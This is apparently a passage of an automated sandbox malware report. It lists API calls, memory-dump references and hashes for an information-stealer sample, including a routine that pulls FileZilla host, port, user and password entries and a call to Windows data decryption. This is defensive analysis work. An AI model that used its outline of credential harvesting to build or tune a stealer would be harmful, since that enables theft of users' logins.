                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                                                                                                • String ID:
                                                                                                • API String ID: 3243516280-0
                                                                                                • Opcode ID: 7a2dd4eca20753c076bf09b0c62142b9a669e1cd6be9ab3d7b47191422cd3cdd
                                                                                                • Instruction ID: b2ce5641e7fa807fe786f78e48a01c4c7ef199da86c861ee62a52048bf8154be
                                                                                                • Opcode Fuzzy Hash: 7a2dd4eca20753c076bf09b0c62142b9a669e1cd6be9ab3d7b47191422cd3cdd
                                                                                                • Instruction Fuzzy Hash: 3611ACB4900209DFCB04DF94D988AAE77B5FF88300F104559ED15A7350D734AE50CF61
                                                                                                APIs
                                                                                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00973EE8,00000000,?,00420DF8,00000000,?,00000000,00000000), ref: 00417BF3
                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,00000000,00000000,?,00973EE8,00000000,?,00420DF8,00000000,?,00000000,00000000,?), ref: 00417BFA
                                                                                                • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00973EE8,00000000,?,00420DF8,00000000,?,00000000,00000000,?), ref: 00417C0D
                                                                                                • wsprintfA.USER32 ref: 00417C47
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                                                                                • String ID:
                                                                                                • API String ID: 362916592-0
                                                                                                • Opcode ID: ef2e8192f2772f232fc7e7fcc2eea8e627b037badb6437208f4d82c9303bd787
                                                                                                • Instruction ID: b2a27aae97358dcb217157a2278e60ef806da717b76b9d8dbc6f71207b10123d
                                                                                                • Opcode Fuzzy Hash: ef2e8192f2772f232fc7e7fcc2eea8e627b037badb6437208f4d82c9303bd787
                                                                                                • Instruction Fuzzy Hash: C011A1B1E0A228EBEB208B54DC45FA9BB79FB45711F1003D6F619932D0E7785A808B95
                                                                                                APIs
                                                                                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417A10
                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417A17
                                                                                                • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00417A2F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Heap$AllocNameProcessUser
                                                                                                • String ID:
                                                                                                • API String ID: 1206570057-0
                                                                                                • Opcode ID: 7e9e81e1a1689cb1da455be5f83933a8c8cca94e355bd3ccc2ffb479564026f7
                                                                                                • Instruction ID: 9b82aaaa51ecd1631f431d3f1c3dae0ecd6dc6cababe86b84151973db8bb3773
                                                                                                • Opcode Fuzzy Hash: 7e9e81e1a1689cb1da455be5f83933a8c8cca94e355bd3ccc2ffb479564026f7
                                                                                                • Instruction Fuzzy Hash: 80F04FB1D49249EBC700DF98DD45BAEBBB8EB45711F10021BF615A2680D7755640CBA1
                                                                                                Strings
                                                                                                • multiple recursive references: %s, xrefs: 61E76A4B
                                                                                                • recursive reference in a subquery: %s, xrefs: 61E76A54
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: multiple recursive references: %s$recursive reference in a subquery: %s
                                                                                                • API String ID: 0-3854365051
                                                                                                • Opcode ID: 297298a0f659725ea1119cf4835fa01018d93a3eeff2d039f5330e37d216fd09
                                                                                                • Instruction ID: 7d5e909c26c2478cc4d8a1152a5e5b16c7ea0641b558a5fde8b477d39de8e8ad
                                                                                                • Opcode Fuzzy Hash: 297298a0f659725ea1119cf4835fa01018d93a3eeff2d039f5330e37d216fd09
                                                                                                • Instruction Fuzzy Hash: 4E8207B4A052899FEB25CFA8C180B9DBBF1BF48308F24C559E859AB355D734E846CF50
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: InfoSystemwsprintf
                                                                                                • String ID:
                                                                                                • API String ID: 2452939696-0
                                                                                                • Opcode ID: 49ec3605ab8d8b87b8f4a2bcd41593a6bcb02f439a1b20a0ae29a7c341f305be
                                                                                                • Instruction ID: 08512fc152d1616d0ad9ea22e4a9698bc695f8d0908738fe214e90ce4e812d63
                                                                                                • Opcode Fuzzy Hash: 49ec3605ab8d8b87b8f4a2bcd41593a6bcb02f439a1b20a0ae29a7c341f305be
                                                                                                • Instruction Fuzzy Hash: 67F06DB1E04218ABCB10CB84EC45FEAFBBDFB48B14F50066AF51592280E7796904CAE5
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd
                                                                                                Similarity
                                                                                                • API ID: memcmp
                                                                                                • String ID:
                                                                                                • API String ID: 1475443563-0
                                                                                                • Opcode ID: c2002dce9f5e4d7c2b5f78abcb95225e97438571cbdf1746bfb7f61ccb496e17
                                                                                                • Instruction ID: 0d30bdf3ca1535cc6e9debfec2a3fa3a34d16498aff86589297f71c0a5a37c1e
                                                                                                • Opcode Fuzzy Hash: c2002dce9f5e4d7c2b5f78abcb95225e97438571cbdf1746bfb7f61ccb496e17
                                                                                                • Instruction Fuzzy Hash: 7DC15D30E082858BEB15CFA8E4D079D7AF1AF8831CF29C46DD8469B349EB74D885CB51

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • GetProcessHeap.KERNEL32(00000000,0098967F,?,00416414,?), ref: 00407784
                                                                                                • RtlAllocateHeap.NTDLL(00000000,?,00416414,?), ref: 0040778B
                                                                                                • lstrcatA.KERNEL32(?,0096C720,?,000003E8,?,000003E8,?,000003E8,?,000003E8,?,000003E8,?,000003E8,?,000003E8), ref: 0040793B
                                                                                                • lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 0040794F
                                                                                                • lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407963
                                                                                                • lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407977
                                                                                                • lstrcatA.KERNEL32(?,00976068,?,00416414,?), ref: 0040798B
                                                                                                • lstrcatA.KERNEL32(?,00975EA0,?,00416414,?), ref: 0040799F
                                                                                                • lstrcatA.KERNEL32(?,00975F78,?,00416414,?), ref: 004079B2
                                                                                                • lstrcatA.KERNEL32(?,00975EB8,?,00416414,?), ref: 004079C6
                                                                                                • lstrcatA.KERNEL32(?,00969A90,?,00416414,?), ref: 004079DA
                                                                                                • lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 004079EE
                                                                                                • lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407A02
                                                                                                • lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407A16
                                                                                                • lstrcatA.KERNEL32(?,00976068,?,00416414,?), ref: 00407A29
                                                                                                • lstrcatA.KERNEL32(?,00975EA0,?,00416414,?), ref: 00407A3D
                                                                                                • lstrcatA.KERNEL32(?,00975F78,?,00416414,?), ref: 00407A51
                                                                                                • lstrcatA.KERNEL32(?,00975EB8,?,00416414,?), ref: 00407A64
                                                                                                • lstrcatA.KERNEL32(?,00969E38,?,00416414,?), ref: 00407A78
                                                                                                • lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407A8C
                                                                                                • lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407AA0
                                                                                                • lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407AB4
                                                                                                • lstrcatA.KERNEL32(?,00976068,?,00416414,?), ref: 00407AC8
                                                                                                • lstrcatA.KERNEL32(?,00975EA0,?,00416414,?), ref: 00407ADB
                                                                                                • lstrcatA.KERNEL32(?,00975F78,?,00416414,?), ref: 00407AEF
                                                                                                • lstrcatA.KERNEL32(?,00975EB8,?,00416414,?), ref: 00407B03
                                                                                                • lstrcatA.KERNEL32(?,00969BC8,?,00416414,?), ref: 00407B16
                                                                                                • lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407B2A
                                                                                                • lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407B3E
                                                                                                • lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407B52
                                                                                                • lstrcatA.KERNEL32(?,00976068,?,00416414,?), ref: 00407B66
                                                                                                • lstrcatA.KERNEL32(?,00975EA0,?,00416414,?), ref: 00407B7A
                                                                                                • lstrcatA.KERNEL32(?,00975F78,?,00416414,?), ref: 00407B8D
                                                                                                • lstrcatA.KERNEL32(?,00975EB8,?,00416414,?), ref: 00407BA1
                                                                                                • lstrcatA.KERNEL32(?,009696E8,?,00416414,?), ref: 00407BB5
                                                                                                • lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407BC9
                                                                                                • lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407BDD
                                                                                                • lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407BF1
                                                                                                • lstrcatA.KERNEL32(?,00976068,?,00416414,?), ref: 00407C04
                                                                                                • lstrcatA.KERNEL32(?,00975EA0,?,00416414,?), ref: 00407C18
                                                                                                • lstrcatA.KERNEL32(?,00975F78,?,00416414,?), ref: 00407C2C
                                                                                                • lstrcatA.KERNEL32(?,00975EB8,?,00416414,?), ref: 00407C3F
                                                                                                • lstrcatA.KERNEL32(?,00969820,?,00416414,?), ref: 00407C53
                                                                                                • lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407C67
                                                                                                • lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407C7B
                                                                                                • lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407C8F
                                                                                                • lstrcatA.KERNEL32(?,00976068,?,00416414,?), ref: 00407CA3
                                                                                                • lstrcatA.KERNEL32(?,00975EA0,?,00416414,?), ref: 00407CB6
                                                                                                • lstrcatA.KERNEL32(?,00975F78,?,00416414,?), ref: 00407CCA
                                                                                                • lstrcatA.KERNEL32(?,00975EB8,?,00416414,?), ref: 00407CDE
                                                                                                  • Part of subcall function 00407630: lstrcatA.KERNEL32(210DE020,0042192C,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?,?,00416414), ref: 00407666
                                                                                                  • Part of subcall function 00407630: lstrcatA.KERNEL32(210DE020,00000000,00000000), ref: 004076A8
                                                                                                  • Part of subcall function 00407630: lstrcatA.KERNEL32(210DE020, : ), ref: 004076BA
                                                                                                  • Part of subcall function 00407630: lstrcatA.KERNEL32(210DE020,00000000,00000000,00000000), ref: 004076EF
                                                                                                  • Part of subcall function 00407630: lstrcatA.KERNEL32(210DE020,00421934), ref: 00407700
                                                                                                  • Part of subcall function 00407630: lstrcatA.KERNEL32(210DE020,00000000,00000000,00000000), ref: 00407733
                                                                                                  • Part of subcall function 00407630: lstrcatA.KERNEL32(210DE020,00421938), ref: 0040774D
                                                                                                  • Part of subcall function 00407630: task.LIBCPMTD ref: 0040775B
                                                                                                • lstrcatA.KERNEL32(?,0096C4E8,?,00000104), ref: 00407E6B
                                                                                                • lstrcatA.KERNEL32(?,00974640), ref: 00407E7E
                                                                                                • lstrlenA.KERNEL32(210DE020), ref: 00407E8B
                                                                                                • lstrlenA.KERNEL32(210DE020), ref: 00407E9B
                                                                                                  • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: lstrcat$Heaplstrlen$AllocateProcesslstrcpytask
                                                                                                • String ID:
                                                                                                • API String ID: 928082926-0
                                                                                                • Opcode ID: 24a6ca59d8a0adc4477e6d15f78518d49f33a6da8cc5e85e890d4912c65980fb
                                                                                                • Instruction ID: 0e0c3d68e69f6296a9396c1eab42491480c8bc0a3d7b858fcfddc2671413b035
                                                                                                • Opcode Fuzzy Hash: 24a6ca59d8a0adc4477e6d15f78518d49f33a6da8cc5e85e890d4912c65980fb
                                                                                                • Instruction Fuzzy Hash: E83264B6D04254ABCB14EB60DC95DDE733EAB48315F004A9EF209A2090EE79F789CF55

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 825 4103b0-41044c call 41aa50 call 418f70 call 41ac30 call 41abb0 call 41ab10 * 2 call 41acc0 call 41abb0 call 41ab10 call 41aab0 call 40a110 848 410452-410469 call 418fc0 825->848 849 410886-410899 call 41ab10 call 401550 825->849 848->849 855 41046f-4104cf strtok_s call 41aa50 * 4 GetProcessHeap HeapAlloc 848->855 865 4104d2-4104d6 855->865 866 4107ea-410881 lstrlenA call 41aab0 call 401590 call 4153e0 call 41ab10 memset call 41ad50 * 4 call 41ab10 * 4 865->866 867 4104dc-4104ed StrStrA 865->867 866->849 868 410526-410537 StrStrA 867->868 869 4104ef-410521 lstrlenA call 418a70 call 41abb0 call 41ab10 867->869 872 410570-410581 StrStrA 868->872 873 410539-41056b lstrlenA call 418a70 call 41abb0 call 41ab10 868->873 869->868 875 410583-4105b5 lstrlenA call 418a70 call 41abb0 call 41ab10 872->875 876 4105ba-4105cb StrStrA 872->876 873->872 875->876 882 4105d1-410623 lstrlenA call 418a70 call 41abb0 call 41ab10 call 41ade0 call 40a210 876->882 883 410659-41066b call 41ade0 lstrlenA 876->883 882->883 926 410625-410654 call 41ab30 call 41acc0 call 41abb0 call 41ab10 882->926 900 410671-410683 call 41ade0 lstrlenA 883->900 901 4107cf-4107e5 strtok_s 883->901 900->901 911 410689-41069b call 41ade0 lstrlenA 900->911 901->865 911->901 921 4106a1-4106b3 call 41ade0 lstrlenA 911->921 921->901 930 4106b9-4107ca lstrcatA * 3 call 41ade0 lstrcatA * 2 call 41ade0 lstrcatA * 3 call 41ade0 lstrcatA * 3 call 41ade0 lstrcatA * 3 call 41ab30 * 4 921->930 926->883 930->901
                                                                                                APIs
                                                                                                  • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                  • Part of subcall function 00418F70: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B
                                                                                                  • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                                                                  • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                                                                                  • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                                                                  • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                                                                  • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                                                                  • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                                                                  • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                                                                                  • Part of subcall function 0040A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040A13C
                                                                                                  • Part of subcall function 0040A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0040A161
                                                                                                  • Part of subcall function 0040A110: LocalAlloc.KERNEL32(00000040,?), ref: 0040A181
                                                                                                  • Part of subcall function 0040A110: ReadFile.KERNEL32(000000FF,?,00000000,00410447,00000000), ref: 0040A1AA
                                                                                                  • Part of subcall function 0040A110: LocalFree.KERNEL32(00410447), ref: 0040A1E0
                                                                                                  • Part of subcall function 0040A110: CloseHandle.KERNEL32(000000FF), ref: 0040A1EA
                                                                                                  • Part of subcall function 00418FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418FE2
                                                                                                • strtok_s.MSVCRT ref: 0041047B
                                                                                                • GetProcessHeap.KERNEL32(00000000,000F423F,00420DBF,00420DBE,00420DBB,00420DBA), ref: 004104C2
                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 004104C9
                                                                                                • StrStrA.SHLWAPI(00000000,<Host>), ref: 004104E5
                                                                                                • lstrlenA.KERNEL32(00000000), ref: 004104F3
                                                                                                  • Part of subcall function 00418A70: malloc.MSVCRT ref: 00418A78
                                                                                                  • Part of subcall function 00418A70: strncpy.MSVCRT ref: 00418A93
                                                                                                • StrStrA.SHLWAPI(00000000,<Port>), ref: 0041052F
                                                                                                • lstrlenA.KERNEL32(00000000), ref: 0041053D
                                                                                                • StrStrA.SHLWAPI(00000000,<User>), ref: 00410579
                                                                                                • lstrlenA.KERNEL32(00000000), ref: 00410587
                                                                                                • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 004105C3
                                                                                                • lstrlenA.KERNEL32(00000000), ref: 004105D5
                                                                                                • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 00410662
                                                                                                • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041067A
                                                                                                • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 00410692
                                                                                                • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 004106AA
                                                                                                • lstrcatA.KERNEL32(?,browser: FileZilla,?,?,00000000), ref: 004106C2
                                                                                                • lstrcatA.KERNEL32(?,profile: null,?,?,00000000), ref: 004106D1
                                                                                                • lstrcatA.KERNEL32(?,url: ,?,?,00000000), ref: 004106E0
                                                                                                • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 004106F3
                                                                                                • lstrcatA.KERNEL32(?,00421770,?,?,00000000), ref: 00410702
                                                                                                • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410715
                                                                                                • lstrcatA.KERNEL32(?,00421774,?,?,00000000), ref: 00410724
                                                                                                • lstrcatA.KERNEL32(?,login: ,?,?,00000000), ref: 00410733
                                                                                                • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410746
                                                                                                • lstrcatA.KERNEL32(?,00421780,?,?,00000000), ref: 00410755
                                                                                                • lstrcatA.KERNEL32(?,password: ,?,?,00000000), ref: 00410764
                                                                                                • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410777
                                                                                                • lstrcatA.KERNEL32(?,00421790,?,?,00000000), ref: 00410786
                                                                                                • lstrcatA.KERNEL32(?,00421794,?,?,00000000), ref: 00410795
                                                                                                • strtok_s.MSVCRT ref: 004107D9
                                                                                                • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 004107EE
                                                                                                • memset.MSVCRT ref: 0041083D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
